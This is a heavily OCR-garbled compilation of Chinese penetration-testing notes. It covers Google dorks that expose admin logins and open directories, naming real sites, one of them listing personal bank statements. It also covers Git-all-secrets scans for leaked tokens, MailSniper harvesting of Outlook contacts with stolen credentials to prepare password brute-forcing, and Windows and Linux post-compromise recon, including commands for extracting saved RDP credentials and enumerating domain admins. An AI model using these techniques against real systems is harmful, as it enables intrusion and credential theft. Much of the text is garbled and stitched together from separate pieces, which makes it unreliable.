学 校 网 站 管理 系统 - 四 川 省 绵阳 实验 高 级 中 学 
wWww.ryesms netadmin/iogin.asp * Translate this page 
75 i. RIP Wi .验证 码 - x RSENS. 2008-2012 $ RIEKIE MRY Al 


Rights Reserved 





后 台 管 理 系统 


www.gonleer.com/admin/manager/login.php v Translate this page 





e intext 


网 站 后 台 管 理 系 统 - Mizu Sushi 


www rzusushiparma.com/admin/Index.asp v Translate this page 


WER: SENA: . Copyright 200 Www. M988.Com Ali Rights Reserved 






CMS 系统 后 台 登 陆 入 口 湖北 省 学 感 高 级 中 学 
wwwhbxggzen/ n/Login.php * Translate this page 
MEAR DIDI 






管理 者 登陆 


Ort hk/en/admin/a 






QR PRR: MPE 





。 搜索 目标 包含 后 台 的 页 面 
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jg: Awesome-} X intext: index of /| ../| Parent’ x + gu- 3 


ê hitps://www.google.com/search?source=hp&ei=Dq_ HXNPPO4ri-gS7xaqYBw&qaintext%BA+index+of+%2F+%7C+.... © & 
Y pe es 





dà RSS O $8 Hx O RARR Cj 在 线 运行 环境 By IDC By ARM E AwesomeBlog EQ REF EJ ToolsWeb È: 
intext: index of / | ../ | Parent Directory & Q 
Adi Images News Videos Shopping More Settings Tools 

— ` "Es "c ra 


About 776.900 results (0.37 seconds) 


Index of /2019 

https://www.girinst.org/2019/ v 

Name - Last modified - Size - Description. [DIR], Parent Directory, -. [DIR], vol19/, 16-Apr-2019 01:48, -. 
Apache/2.2.34 (Amazon) Server at www.girinst.org Port ... 


Index of /UserFiles/TaxMaster/Personal Bank Statements 
ppi-inc.net/UserFiles/TaxMaster/Personal%20Bank%20Statements/ v 

index of /UserFiles/TaxMaster/Personal Bank Statements, Name - Last modified . Size : Description - 
Parent Directory, -. Pentagon Federal Cre .> 2012-12-03 20: .. 


Index of /db 

www.allenarchive.com/db/ v 

Parent Directory, - admin/, 2010-01-09 ... 2010-02-10 23:29, -. index.php.1317077717, 2011-09-25 
04:27, 12K. index php.1317169813, 2011-09-26 18:55, 12K. 


Index of /HDD1/English Movies - Last modified 
103.114.38.38/HDD1/English%20Movies/ * 

Parent Directory, ~. [VID], 2.Headed.Shark.Attack.2012.mkv, 2018-08-02 11:42, 350M. [VID], 
2Eleven.2015.mp4, 2018-07-03 16:53, 2.06. [VID], 3.Knee.Deep. 


Index of /HDD1/Hindi Movies/2018 - Last modified 
103.114.38.38/HDD1/Hindi%20Movies/2018/ v 
Parent Directory, -. VIDI. 102 Not Out (2018).mkv. 2018-07-11 12:40, 2.26. IVIDI, Aapla 


搜索 目标 是 否 有 列 目录 
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Git-all-secret 


Git-all-secret 功 能 描述 


。 克隆 多 个 某 组 织 的 public/private 有 仓库 并 扫描 ; s 

。 克隆 多 个 某 组 织 用 户 的 public/private 仓库 并 扫描 ; 

。 克隆 一 个 某 组 织 的 public/private 仓库 并 扫描 ; 

。 克隆 一 个 某 用 户 的 public/private 仓库 并 扫描 ; 

。 克隆 一 个 某 用 户 的 public/secret gist (代码 片段 管理 服务 ) 并 扫描 ; 
。 克隆 一 个 某 组 织 团队 的 仓库 并 扫描 ; 

。 克隆 和 扫描 Github 企 业 仓库 还 有 gists; 


扫描 过 程 需要 借助 的 开源 工具 : 


。 truffleHog - 扫描 高 粹 值 字符 串 和 用 户 提 供 的 正则 表达 式 ; 
。 repo-supervisor 扫描 在 js 和 json 文 件 中 的 高 粹 值 字符 串 ; 


所 有 工具 中 的 输出 文件 最 终 会 合并 为 一 个 输出 文件 。 


新 手 入 门 


运行 Git-all-secrets 最 简便 的 方法 是 使 用 Docker， 作 者 也 强烈 推荐 安装 Docker。 
获取 Docker: apt install docker docker-compose 


。 运行 docker run --rm -it abhartiya/tools_gitallsecrets --help 了 解 不 同 标志 

。 运行 docker run -it abhartiya/tools_gitallsecrets -token=<> -org=<> 扫描 组 织 

。 运行 docker run -it abhartiya/tools gitallsecrets -token=<> * -org=<> -toolName-«» 选择 特定 
工具 ，toolName=thog or repo-supervisor 

。 运行 docker run -it abhartiya/tools_gitallsecrets -token=<> -org=<> -toolName=thog - 
thogEntropy truffleHogB 3A TEMAS Hike 

。 当 容 器 完成 运行 ， 输 入 docker ps -a 返回 容器 ID 

获得 容器 ID 以 后 ， 输 入 docker cp :/root/results.txt 来 获取 结果 文件 。 


标志 /选项 


* -token= Github 访 问 令 牌 。 如 果 未 授权 请 求 Github API 会 被 限 速 。 

。 -org= 组 织 扫 描 。 它 会 扫描 组 织 中 的 所 有 公共 仓库 ， 以 及 用 户 的 gists。 如 果 你 使 用 的 是 该 组 织 
用 户 的 token， 它 还 会 克隆 并 扫描 该 用 户 的 所 有 私密 gists， 以 及 所 有 该 用 户 有 权限 访问 的 私有 仓 
库 。 

。 -User= 用 户 扫 描 。 它 会 扫描 当前 用 户 的 所 有 仓库 和 gists， 扫 描 私 有 仓库 请 使 用 
scanPrivateReposOnly 标 志 ， 以 及 SSHkey。 
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-repoURL= httpsURL 仓库 扫描 。 它 只 会 扫描 当前 仓库 。 如 果 你 希望 扫描 私有 仓库 ， 请 提供 

SSH URL 和 SSHkey， 以 及 scanPrivateReposOnly 标 志 。 

-gistURL= httpsURL Gist 扫 描 。 它 只 会 扫描 Gist。 如 果 你 知道 私密 gist 的 httpsURL， 它 也 能 够 访 

问 。 

。-output= 输出 结果 文件 ， 默认 是 result.txt。 

。 -cloneForks= 这 是 一 个 布尔 标志 。 默 认 设置 为 0， 不 克隆 forks， 如 果 设 置 为 1， 它 就 会 克隆 
forks, 

。 -orgOnly- 这 也 是 一 个 布尔 标志 。 默认 设置 为 0。 如 果 只 扫描 组 织 仓库 而 不 扫描 用 户 的 仓库 ， 请 
将 它 设 置 为 1。 

。 -toolName- 这 是 规范 扫描 工具 的 标志 。 默 认 它 使 用 all，thog 和 repo-supervisor。 

。 -scanPrivateReposOnly- 这 是 规范 是 否 扫描 用 户 私 有 仓库 的 标志 。 它 只 能 工作 在 user、 
repoURL、org 标 志 。 

。 -enterpriseURL= 企业 GithubURL 的 标志 ， 如 果 你 希望 扫描 企业 仓库 ， 就 选 这 个 。 

。 -threads= 默认 线程 10。 

e -thogEntropy= 开启 高 焙 提 取 ， 默 认 是 false。 设 置 为 tue 会 有 大 量 的 垃圾 信息 ， 在 比较 大 的 目标 
上 ， 不 建议 开启 。 如 果 设 置 为 false， 则 意味 着 truffleHog 只 会 提取 基于 rules.json 文 件 中 的 正则 
结果 。 

e -blacklist= 不 需要 扫描 的 仓库 名 称 ， 以 逗号 分 隔 。 


注意 事项 


。 Token 选 项 不 能 为 空 。 

* Org user repoURL gistURL 不 能 都 设置 为 空 ， 至 少 需要 提供 一 个 选项 。 如 果 你 提供 了 多 个 选 
项 ， 他 的 顺序 是 org>user>repoURL>gistURL。 如 果 你 只 需要 运行 在 特定 用 户 上 ， 那 就 不 需要 
提供 org 选 项 。 

。 当 定 义 scanPrivateReposOnly 标 志 时 : 

1. 必须 将 包含 SSH-key 的 卷 载 入 到 Docker 容 器 中 ， 使 用 -v 选 项 。 

2. 它 应 该 在 扫描 私有 仓库 时 使 用 ， 使 用 SSH url， 而 不 是 https url。 

3. 确保 使 用 了 私有 仓库 /gist 的 用 户 token， 否 则 会 报错 。 

4. 如 果 你 想 在 没有 手动 干扰 的 情况 下 运行 ， 请 不 要 设置 SSH key 的 密 钥 密 码 。 

e 当 定 义 teamName 标 志 的 时 候 ， 提 供 一 个 团队 成 员 用 户 的 token 非 常 重 要 ， 否 则 可 能 会 出 现 意外 
结果 。 

* 当 定义 enterpriseURL 标 志 的 时 候 ， 即 使 你 提供 了 https URL， 它 也 始终 会 考虑 ssh key. PRA 
业 克 隆 /扫描 都 是 通过 ssh url， 而 不 是 https urls 


综 上 ， 请 确保 使 用 了 SSH key， 并 且 没 有 设置 密 钥 密码 。 


扫描 私有 仓库 


是 和 有 仓库 最 稳妥 的 方法 是 使 用 SSH URL 克 隆 。 实 现 这 个 你 需要 将 SSH Wi Github A Ao 
用 户 配 置 参 考 : ， i 


WRE Ney IRERE, 有 了 SSH key 以 后 ， 将 它 挂 载 到 Docker 容 器 中 ， 运 行 如 下 命令 : 
docker run -it -v ~/. ssh/id_rsa_personal:/root/.ssh/id_rsa abhartiya/tools_gitallsecrets -token=<> - 
user=<> -scanPrivateReposOnly or docker run -it -v ~/.ssh/id_rsa_personal:/root/.ssh/id_rsa 
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abhartiya/tools_gitallsecrets -token=<> -repoURL=<> -scanPrivateReposOnly 将 本 地 的 personal 
SSH-key 存 储 到 Docker 内 部 容器 /root/.ssh/id_rsa，git-all-secrets 会 试图 通过 存储 在 /root/.ssh/id_rsa 
的 ssh key 来 克隆 仓库 。 


扫描 组 织 团队 


Github API 限 制 了 私有 仓库 环境 。 尝 试 使 用 非 管理 员 用 户 扫 描 组 织 ， 需要 给 用 户 添加 仓库 的 访问 权 
限 。 如 果 要 扫描 组 织 团队 ， 可 以 运行 : docker run --it -v ~/.ssh/id_rsa_personal:/root/.ssh/id_rsa 
abhartiya/tools gitallsecrets -token=<> -org=<> -teamName <> 


扫描 企业 Github 


git-all-secrets 支 持 扫描 企业 仓库 ， 使 用 enterpriseURL 选 项 : 


实例 1: 


docker run -it -v ~/.ssh/id_rsa_gitenterprise:/root/.ssh/id_rsa -token -enterpriseURL 
..com/api/v3 -repoURL ..com//.git 


实例 2 : 


docker run -it -v ~/.ssh/id_rsa_gitenterprise:/root/.ssh/id_rsa -token -enterpriseURL 
..com/api/v3 -repoURL ..com//.git -toolName thog -thogEntropy 


实例 3: 


docker run -it -v ~/.ssh/id_rsa_gitenterprise:/root/.ssh/id_rsa -token -enterpriseURL 
..com/api/v3 -user -scanPrivateReposOnly 


特性 


可 以 添加 自己 的 正则 表达 式 ， 在 docker run 的 时 候 使 用 -v 
$(pwd)/rules.json:/root/truffleHog/rules.json. 可 以 使 用 默认 正则 表达 式 ， 如 果 需 要 ， 也 可 以 用 
truffleHog 提 供 的 高 焙 字 符 串 。 可 以 通过 repo-supervisor 工 具 搜索 .js 和 .json 中 的 高 焙 字 符 串 。 可 以 
搜索 用 户 的 Gist， 大 多 数 工具 都 没 这 个 功能 。 有 新 工具 可 以 很 容易 地 集成 到 git-all-secrets。 支持 扫 
描 企 业 Github orgs/users/repos/gists。 大 多 数 工具 只 扫描 单个 仓库 ，git-all-secrets 可 以 一 次 扫描 多 


个 
lo 
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mailsniper.ps1 获 取 outlook 所 有 联系 人 
0x01 条 件 


掌握 其 中 一 个 用 户 邮箱 的 账号 密码 ， 并 且 可 以 登录 outlook 
outlook 地 址 可 以 是 官方 的 也 可 以 是 目标 自己 搭建 的 ， 并 无 影响 。 


0x02 目的 


获取 目标 邮箱 里 的 所 有 联系 人 ， 方 便 后 续 爆破 弱 口 令 等 等 


0x03 利用 
0、 命 令 


将 尝试 Outlook Web Access (OWA) 和 Exchange Web 服 务 (EWS) 的 方法 。 此 命令 可 用 于 从 
Exchange 收 集 电子 邮件 列表 : 


Get-GlobalAddressList -ExchHostname outlook 地 址 -UserName 域名 \ 域 用 户 名 -Password ! 


> 


1、 目 标 outlook 搭 建 在 自己 服务 器 上 
此 处 使 用 klion 的 域 环境 模拟 
在 mailsniper.ps1 最 后 一 行 加 入 以 下 代码 ， 也 可 以 通过 传 参 的 形式 调用 。 


Get-GlobalAddressList -ExchHostname owa2010cn-god.god.org -UserName god\webadmir 


> 


尝试 使 用 我 们 传递 的 账号 密码 去 登录 目标 的 outlook， 成 功 登录 后 会 把 邮件 里 的 联系 人 都 获取 下 来 ， 
并 输出 保存 到 文件 里 
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EWS/Exchange. a 
w attempting x A ist. This mi 


Administrator&god. org 





2、 目 标 outlook 在 office365 


一 样 的 道理 ， 只 不 过 把 ExchHostname 只 向 outlook.office365.com 即 可 ，username 使 用 完整 的 邮 
箱 ， 而 不 仅仅 是 用 户 名 。 


Get-GlobalAddressList -ExchHostname outlook.office365.com -UserName RPG 





工具 地 址 : 
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内 网 渗透 之 信息 收集 
0x01 Windows 《工作 组 和 域 ) 
0x01-1 检查 当前 shell 权 限 


whoami /user && whoami /priv 


C:\netasploit-framevork\bin>whoami /user 


SID 


vin88-ueb*sadministrator $-1-5-21~4196598855 44786 73 32-234968 7210-580 





0x01-2 查看 系统 信息 


Systeminfo 


主机 名 -> 扮演 的 角色 
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主机 名 : AHCJ-WIN2003-2 


OS 名 称 : Microsoft(R) Windows(R) Server 2003, Enterprise Edition 
OS 版 本 : 5.2.3790 Service Pack 2 Build 3790 

OS 制造 商 ; Microsoft Corporation 

os 配置 : 独立 服务 器 

OS 构件 类 型 : Uniprocessor Free 

注册 的 所 有 人 : AHGO M , 
注册 的 组 织 : 

Man ID: 69813-651-6082552-45965 

初始 安装 日 期 : 2015-6-25, 14:42:37 

系统 启动 时 间 : 暂 缺 

系统 制造 商 : Red Hat 

系统 型 号 ; KVM 

系统 类 型 ; X86-based PC 

处 理 器 : 安装 了 1 个 处 理 器 。 


[01]: x86 Family 6 Model 13 Stepping 3 GenuineIntel ~1994 Mhz 
BIOS 版 本 : BOCHS -1 


Windows BR: C: \WINDOWS 

系统 目录 : C:\WINDOWS\system32 

启动 设备 : \Device\HarddiskVolume1 

系统 区 域 设 置 : zh-cn; 中 文 ( 中 国 ) 

输入 法 区 域 设置 : ”zh-cn; 中 文 (中 国 ) 

时 区 : (GMT+08:00) 北京 ， 重 庆 ， 香 港 特 别 行政 区 ， 乌 鲁 木 齐 
物理 内 存 总 量 : 2,048 MB 


可 用 的 物理 内 存 : 1,416 MB 
HEX: RA: 2,474 MB 
页 面 文件 ; 可用: 2,150 MB 
页 面 文件 ; 使 用 中 : 324 MB 


页 面 文件 位 置 : C:\pagefile.sys 

域 : WORKGROUP 

登录 服务 器 : \\AHCJ -WIN2003-2 

修补 程序 : 安装 了 6 个 修补 程序 。 
[01]: File 1 
[02]: File 1 


[03]: Q147222 

[04]: KB968930 - Update 
[05]: KB942288-v4 - Update 
[06]: KB954550-v5 


WE: 安装 了 1 个 NIC. 
[01]: Realtek RTL8139 Family PCI Fast Ethernet NIC 
连接 名 : 本 地 连接 4 
启用 DHP: 
IP 地 址 


[01]: 192.168.87.55 


0x01-2 tcp/udp 网 络 连 接 状 态 信息 
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netstat -ano 


可 以 获取 内 网 IP 分 布 状态 -服务 (redis) 


c:\pocument 


Active Connections 


proto 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 
UDP 


Local Address 


220000000 
220000000 


0:80 
0:135 
0:445 

.0:1030 
0:1723 
0:3389 
0:47001 


,168.87.55:139 
.168.87.55:3389 


1445 
:500 
11025 
:1029 
:1701 
:4500 
Peles 
nar 2027 
.1:1028 


.168.87.55:123 
.168.87.55:137 
2168:87.55:138 


0x01-3 机 器 名 


hostname 


Foreign 


0 
0 
0 
0 
9. 
9 
0 
9 


192.168. 


oOooo0000 © 


s and Settings\test\ 桌 面 >netstat -ano 


Address 


87.1:25512 


C:\Documents and Settings\test\ 桌 面 >hostname 
ahcj-win2003-2 


C 


win@8—web 


0x01-4 查看 当前 操作 系统 


wmic OS get Caption, CSDVersion,OSArchitecture, Version 


ver 
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Users Administrator \Desktop>hostname 





State 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
ESTABLISHED 


Operating System Version PlatformID 


Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 
Windows 


8 6.2 VER PLATFORM WIN32 NT (=2) 

7 6.1 VER PLATFORM WIN32 NT 

Server 2008 R2 6.1 VER PLATFORM WIN32 NT 
Server 2008 6.0 VER PLATFORM WIN32 NT 

Vista 6.0 VER PLATFORM WIN32 NT 

Server 2003 R2 5.2 VER PLATFORM WIN32. NT 
Server 2003 5.2 VER PLATFORM WIN32 NT 

XP 64-Bit Edition 5.2 VER PLATFORM WIN32 NT 
XP 5.1 VER PLATFORM WIN32 NT 

2000 5.0 VER PLATFORM WIN32 NT 

NT 4.0 4.0 VER PLATFORM WIN32 NT 

NT 3.51 3.51 ? VER PLATFORM WINS32 NT 
Millennium Edition 4.90 VER PLATFORM WIN32 WINDOWS (-1) 
98 4.10 VER PLATFORM WIN32 WINDOWS 

95 4.0 VER PLATFORM WIN32. WINDOWS 

3.1 3.1 ? VER PLATFORM WIN32s (=0) 


C:NsersMidninistratorwNDesktop?umic OS get Caption,CSDUersion,OSfirchitecture,Uersion 


tion 


CSDUersion OSArchitecture Version 


icrosoft Windows Server 2088 R2 Standard 64-bit 6.1.7680 


C: Users Administrator \Desktop>ver 


Microsoft. Windows th AR 6.1.7608] 





0x01-5 查 杀 软 


WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get 
displayName /Format:List 





0x01-6 查看 当前 安装 的 程序 


wmic product get name,version 
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sqladmin>wmic product get name, version 


Name 
Micro oft 
Micro oft 
Python 2.7.16 
Micro ;oft 


, Server y 


office 2083 Web Components 
Application Error Reporting 
<64-bit> 
ver Compact 3.5 SP2 Query Tools 
BI Development Studio 
Database Engine Services 


:s Server 2 
oft 1 
2pyices 
Full text search 
BI Development Studio 
2 Management Studio 


Viewer Redistributable 2888 SP1 


Server 
sosoft Report 
8 Update 281 64-bit? 

SE Deve lopment Kit 8 Update 261 
SQL Server 2688 R2 
2008 R2 Databa: 
SQL USS Uri 
SQL 2008 R2 Rs 
BAS R2 Database Engine Shared 
2008 Redistributable 


Language Pack CHS 


(64-bit? 
fm» 


Engine Services 


rosoft 
erver 
oft Server 
oft Server x Driver 
J r 
oft Uis 

Tool 


oft Ui 


x64 9.0.30729.6161 


Redistributable - x86 9.0.30729.6161 
v1.0 (x64) zh-CHS 


ruices 


2008 
oft Sync Framevork Runt ime 
Server 2688 R2 
erver 2008 R2 Analysis 
rf - : 


ual ++ 


Re port ing 
"vic 
* Compact 3.5 § 
Client Tools 
SQL 2008 S 支持 文件 
Report Viewer Redi butable 2008 ¢KB9'71119> 
Server 2888 R2 HAAR 
Services for ADO.NET v2.8 (x64) 
R2 Integration Services 
Tools for Applications 
R2 Database Engine Shared 
R2 Client Tools 


Studio Tools 


2048 R 


erver 
oft Server 


oft 
zh-CHS 


Studio 2.8 Language Pack ~ CHS 
2008 
(Puer 2008 
soft Ui 
2088 R2 


soft SQL Server 


Server 


ual for Applications 


Integration Services 


PRUE 


Browser 


0x01-7 查看 在 线 用 户 


quser 


C:\Documents and Settings\test\M>quser 


用 户 名 会 话 名 ID KA 空闲 时 间 
>test rdp-tcp#1 1 ”运行 中 


0x01-8 查看 网 络 配 置 


有 Primary Dns Suffix 就 说 明 是 域内 . 空 的 则 当前 机 器 应 该 在 工作 组 


ipconfig /all 


I» 
ul 


Version 


12.@.6213 .1608 
12.80.6815 5968 


2.7.16158 
3.5.8888.8 
14.58.1608.1 
180.50.16080.1 
10.50.1600.1 
18.50.1600.1 
18.58.1608.1 
18.50.1608.1 
18.58.16800.1 
9 .6.30729 
8.0.28010.9 
8.0.20190.9 
18.50.16098.1 
16.56.1606.1 
18.50.1680.1 
10.50.1600.1 
18.50.1608.1 


9.0.30729.6161 
16.1.6.5214329 
9.0.30729 .6161 


1.0.1215.0 
14.56.1666.1 
19.56.160@.1 
3.5.8880.6 
10.50.1688. 1 
18.1.2731.0 
9.0.30731 
16.56.1666.1 
2.0.1215.08 
10.50.16080.1 
9.0.35191 
18.50.16080.1 
18.50.1608.1 
9.@.35191 
18.580.16900.1 
18.50.1600.1 





登录 时 间 
2019-10-9 19:28 


C:\Users\Administrator\Desktop>ipconfig /all 


Windows IP 配置 


EMA S Lo ono ooo REEL WUDOS Web 

E ONS EA 二 94 0 ONERE Hack Local 

节点 类 型 € 0) X ) epo. VIERTE 混合 » 

IP REB RH 63 SEEDS E 

WINS 代理 已 启用 二 1... i. i B 

ONS BARRIER ... .. ，，， hack.local 
localdomain 


以 太 网 适配器 hack: 


连接 特定 的 DNS FARR... ll: 
FER. a a we kw et ww s s ss ¢ Intel(R) PRO/1000 MT Network Connection #: 


物理 地 二 o e on a a e eet + t 00-0C-29-B5-02-C8 
DHCP ELE. o T WS ae ce Same 
EKNPCGRBRH...... t X 

本 地 链接 Ipve HbHb. . 0. . . . . . : fe80::d4b7:2ac1:d23:3163%14 ( Bit) 
TPA MaE MEL uc :925169:525 28 (bien) 

"Nu cu @ T 255n255e255.0 

E Exc cda bel ean en 945869.52«254 

DHCPVORDAIDII I 282105: e 5:9352394649 

DHCPv6 客户 端 DUID . . . . . . . : 00-01-00-01-24-D9-7B-1D-00-0C-29-B5-02-B4 
DNS AR SS ako uec TI de. 01925168152. 2 

TCPIP EA) NetBIOS .......: BAR 
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> vwinB8-ueb 
hack. local 
E ex 


hack. local 
localdomain 


Intel¢R> PRO/18808 MT Network Connection #3 
: 00-0C-29-B5-02 -C8 
" 1 
E cy [ 
fe8@::d4b?7:2aci:d23:3163%14¢ & 
: 192.168.52.28¢ it 
8255255. 255.6 
se. lol o ee eb Uke mE TA See Pe OS IDA A04 
DHCPu6 IAID a 25; iis + «= 3 352324649 
DHCPu6 ZEF DICH PM : 80-01-00-01-24-D9 -7B-1D-00-8C-29-B5-02-B4 
3 ::192.168.52..2 
已 局 用 


ET 





0x01-9 查看 进程 


tasklist /v 


有 些 进程 可 能 是 域 用 户 启 的 -> 通过 管理 员 权限 EER -> 窃取 域 用 户 的 凭证 


C:\Documents and Settings\test\ 桌 面 >tasklist /v , 





映像 名 称 PID 会 话 名 会 话 # 内 存 使 用 ”状态 
System Idle Process 0 9 28 K 
System 4 0 296 K 
smss.exe 284 (0) 500 K 
csrss.exe 232 0 5,836 K 
winlogon.exe 356 0 9,288 K 
services.exe 404 0 18,344 K 
lsass.exe 440 9 8,348 K 
vmacthlp.exe 612 0 2,120 K 
svchost.exe 632 0 3,312 K 
svchost.exe 700 9 4,076 K 
svchost.exe 764 0 4,436 K 
svchost.exe 800 0 3,560 K 
svchost.exe 816 9 25,532 K 
spoolsv.exe 932 0 5,224 K 
msdtc.exe 964 0 4,588 K 
cisvc.exe 1080 9 8,524 K 
svchost.exe 1140 0 2,260 K 
inetinfo.exe 1228 9 8,708 K 
rhsrvany.exe 1344 9 1,980 K 
powershell.exe 1388 0 38,752 K 
svchost.exe 1444 0 1,324 K 
RetinaEngine.exe 1472 9 61,244 K 
sqlwriter.exe 1532 0 3,924 K 
VGAuthService.exe 1588 9 9,292 K 
webtool.exe 1656 0 6,196 K 
eeyeevnt.exe 1756 0 9,808 K 
svchost.exe 1844 0 6,556 K 
svchost.exe 1872 0 Boe Kk 
svchost.exe 2104 0 4,076 K 
dllhost.exe 2216 0 1,528 K 
svchost.exe 2492 0 4,744 K 
csrss.exe 2768 RDP-Tcp#1 5l 7,876 K 
winlogon.exe 2796 RDP-Tcp#1 al 2,536 K 
rdpclip.exe 2944 RDP-Tcp£1 1 3,752 K 
explorer.exe 3020 RDP-Tcp#1 1 14,416 K 
supersrh.exe 3172 RDP-Tcp#1 al 6,928 K 
ctfmon.exe 3200 RDP-Tcp#1 at 3,396 K 
cmd.exe 3256 RDP-Tcp#1 al 3,576 K 
conime.exe 3272 RDP-Tcp#1 zd 2,476 K 
wmiprvse.exe 3380 0 5,144 K 
cidaemon.exe 3636 0 2,268 K 
cidaemon. exe 3684 9 916 K 
logon.scr 328 9 1,852 K 
wmiprvse.exe 4040 0 8,096 K 


48 


4088 0 4,400 K Unk 
216 RDP-Tcp#1 1 440 K Rur 
1584 RDP-Tcp#1 4,008 K Unk 


wmiprvse . xe 
notepad. exe 
tasklist.exe 


H 


b 


0x01-10 查看 当前 登录 域 


net config workstation 


c:\Users\Administrator\Desktop>net config workstation 


计算 机 名 NNWINO8-WEB 
计算 机 全 名 win08-web.hack.local 
RP Administrator 
工作 站 正 运行 于 


NetBT_Tcpip_{8BF769C5-CA65-4810-907F-038B7869DB89} (000C29B502C8 ) 
NetBT_Tcpip_{ADFDD8BB - 7022-41D8-9F42-0407E9C8D417} (000C29B502BE) 
NetBT_Tcpip_{E707AA31-65E2-4165-AB18-4F54A186BBBA} (000C29B502B4) 


软件 版 本 Windows Server 2008 R2 Standard 
工作 站 域 HACK 

工作 站 域 DNS 名 称 hack. local 

登录 域 WINO8 -WEB 

COM 打开 超时 ( 秒 ) 0 

COM 发 送 计数 ( 字 节 ) 16 

COM 发 送 超 时 (毫秒 ) 250 

命令 成 功 完 成 。 


ers Administrator\Desktop>net config workstation 
d \WINO8 -WEB 
winð8-veb.haċk.local 
Administrator 


UE 
NetBT Tcpip €8BF76905-Cá65-4810-907F-038B7869DB89? (08029 B582C8) 
MetBT Tcpip XADFDD8BB-7022-41D8-9F42-0407E9C8D417» (080C29B502BE» 
NetBT Tcpip «(E?878031-65E2-4165-0B18—4F540186BBBaà? (000C29B592B4» 


Windows Server 2008 R2 Standard 
HACK 
hack. local 


WING8-WEB 


a 
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0x01-11 远程 桌面 连接 历史 记录 


cmdkey /1 
把 凭证 取 下 来 -> 本 地 解密 
C:\Users\Administrator>cmdkey 7/1 


= 


dan] e M 4-4 
IERI: 
i Uu irl 


Her: Domnain:target=T 
: jagga 


à 
* 
e Ww os 


Fath: Domain:target =TI 


I: job gy 
hd Poy ily M 





0x01-12 查看 本 机 上 的 用 户 帐 号 列表 


net user 


C:\Users\Administrator\Desktop>net user 


\\WINO8-WEB 的 用 户 帐户 


Administrator Guest 
命令 成 功 完成 。 


0x01-13 查看 本 机 用 户 XXX 的 信息 


net USer XXX 
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nistrator\Desktop>net user administrator 
Administrator 


管理 计算 机 ( 域 ) 的 内 置 帐户 
000 (系统 默认 值 ) 
YES mand 
从 不 
2019/8/5 13:56:26 
2019/9/16 13:56:26 
2019/8/6 13:56:26 
Yes 


Yes 


All 


2019/10/10 19:35:21 
All 


*Administrators 
*None 


/domain 显示 所 在 域 的 用 户 名 单 
域 用 户 /domain ”获取 某 个 域 用 户 的 详细 信息 
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C:\Users\Administrator\Desktop>net user /domain 


\\OWA2010CN-GOD 的 用 户 帐 户 


Administrator boss dbadmin 
debian devadmain fedora 
fileadmin Guest hr 
jenkins kali 
klionsec krbtgt 
logtest mack 
Y SM 6ef9b5ce414946ae9 SM_¢330a5709f6a478b8 
SM. d3853544b62a421fb SM d80bb46e75164f258 vpnadm 
webadmin 
命令 成 功 完成 。 


esktop>net user dbadmin /domain 
dbadmin 


dbadmin 


000 《系统 默认 值 ) 
Yes 


从 不 


2019/1/29 14:09:29 
从 不 
2019/1/30 14:09:29 
Yes 
Yes 


次 登录 2019/3/17 16:11:30 


可 允许 的 登录 小 时 数 All 
本 地 组 成 员 


全 局 组 成 员 : *Domain Users 
命令 成 功 完成 。 


0x02 Windows (ii) 





nltest /domain trusts /all trusts /v /server:192.168.52.2 返回 所 有 信任 192 . 1 


nltest /dsgetdc:hack /server:192.168.52.2 返回 域 控 和 其 相应 的 IP 地 


C:\Windows\System32>nltest /domain_trusts /all_trusts /v /server:192.168.52.2 
域 信任 的 列表 : 
@: HACK hack.local (NT 5) (Forest Tree Root) (Primary Domain) (Native) 
Dom Guid: 50fbcf3b-a8b3-4205-b903-fibef54dde44 
Dom Sid: S-1-5-21-675002476-827761145 - 2127888524 


此 命令 成 功 完成 


C:\Windows\System32>nltest /dsgetdc:hack /server:192.168.52.2 
DC: NNWINDOWS SERVER 

Hott: \\192.168.52.2 

Dom Guid: 50fbcf3b-a8b3-4205-b903-fibef54dde44 

Dom 名 称 : HACK 

林 名 称 : hack.local 
DC 站 点 名 称 : Default-First-Site-Name 
我 们 的 站 点 名 称 : Default-First-Site-Name 
标志 : PDC GC DS LDAP KDC TIMESERV GTIMESERV WRITABLE DNS FOREST CLOSE SI 

此 命令 成 功 完成 


en32>nitest /domain_trusts /all trusts /v /server:192.168.52.2 


hack. local (NI 5> (Forest Tree Root) (Primary Domain) <Native> 
S@f be f 3b-a8b3-4285-h5903-fibef54dde44 
21-675 862 476 -827761145 -2127888524 


"dsgetdc:hack /server:192.168.52.2 


Dom Guid: 5@fbcef3b-a8h3-4205-b903-f ibef54dde44 
Dom fh: HACK 
fi: hack. local 
aff: Default-Fi 
$ ault- t-Site-Name 
C DS LDAP KDC TIMESERU GTIMESERU WRITABLE DNS FOREST CLOSE SITE FULL SECRET WS @x1C@00 


ers \Administrator>net user /do 


的 用 户 帐 户 
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net group 
net group 
net group 
net group 


"domain 
"domain 
"domain 


/domain 


admins" /domain 获取 域 管 理 员 列表 

controllers" /domain 查看 域 控制 器 (如 果 有 多 台 ) 

computers" /domain 查看 域 机 器 
查询 域 里 面 的 工作 组 


group domain admins" /domain 


troup domain controllers" /domain 


作 站 和 服务 器 


VIN12-IIS3 
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jistrator^net: group /domain 


Controllers 





net localgroup administrators 本 机 管理 员 [ 通 常 含有 域 用 户 ] 
net localgroup administrators /domain 登录 本 机 的 域 管 理 员 
net localgroup administrators workgroup\user001 /add 域 用 户 添 加 到 本 机 
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t view 查看 同一 域内 机 器 列表 

view \\ip 查看 某 IP 共 享 
( view \\GHQ 查看 GHQ 计 算 机 的 共 ud. RM 
t view /domain 查看 内 网 存在 多 少 个 

view /domain: XYZ 21:70 ake 表 。 


| 


OO 


: WINDOWS \system3d>net view /domain:S.. 
aj Be ax 各 种 SECURUS 


NMI504 
aS HiT RETA e 


Co NERA AREER NR te 


>: WINDOWS Ns ys tem32pnet view /domain: | 
何 服 器 名 各 i 








语气 执行 成 功 。 


net accounts /domain # 查询 域 用 户 密码 过 期 等 信息 








0x03 Linux 
0x03-1 查看 当前 权限 


whoami 


[root@localhost ^Ht whoami 


root 


0x03-2 查看 网 卡 配 置 


ifconfig 





[root( localhost "Hf ifconfig 
